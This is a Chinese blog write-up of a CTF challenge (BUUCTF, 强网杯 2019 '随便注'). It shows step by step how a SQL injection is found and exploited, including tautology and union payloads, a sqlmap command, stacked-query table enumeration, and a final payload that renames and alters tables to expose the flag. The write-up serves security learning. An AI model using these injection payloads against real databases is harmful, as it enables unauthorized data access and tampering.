码迷,mamicode.com
首页 > 其他好文 > 详细

BUUCTF-[强网杯 2019]随便注

时间:2020-02-23 20:34:17      阅读:118      评论:0      收藏:0      [点我收藏+]

标签:参考   sqli   好用   语句   hang   ant   参考资料   ons   mamicode   

技术图片

随便注?

那么我就不客气了,先试试返回真值:

 or 1=1#

返回了所有查询内容,共三条,order by猜测字段长,发现为2,验证了一下:

技术图片

日常操作:

 or 1=1 union select 1,table_name,3 from information_schema.tables#

技术图片

匹配关键字?百度一下发现是被过滤了,没法使用上面的语句进行查询

手注总没有自动好用,拿去sqlmap跑一下,注出库名:supersqli

C:\Program Files\Python38\sqlmap>python sqlmap.py -u "http://0232d970-6f71-4069-8a93-55f18f3a06d7.node3.buuoj.cn/?inject=1" --forms --batch --dbs

技术图片

但是想看表的时候,返回库里面不存在表,无论怎么都注不出来

无奈去看大佬的WP,看到是sql堆叠注入

技术图片

技术图片

技术图片

上面注出了supersqli所以这里只去看这个库

1;show tables from supersqli#

技术图片

1;show columns from `1919810931114514`#

技术图片

找到flag在哪里了

但是不会查看,去看了别人的方法:

技术图片

payload:

0‘;rename table words to words1;rename table `1919810931114514` to words;alter table words change flag id varchar(100) CHARACTER SET utf8 COLLATE utf8_general_ci NOT NULL;desc  words;#

参考资料:https://www.jianshu.com/p/6c6a44517dd7

一知半解的样子,虽然网上答案很多,但是基本上模板都是那几个,这个大佬的讲解还挺不错的

技术图片

技术图片

BUUCTF-[强网杯 2019]随便注

标签:参考   sqli   好用   语句   hang   ant   参考资料   ons   mamicode   

原文地址:https://www.cnblogs.com/echoDetected/p/12353310.html

(0)
(0)
   
举报
评论 一句话评论(0
登录后才能评论!
© 2014 mamicode.com 版权所有  联系我们:gaon5@hotmail.com
迷上了代码!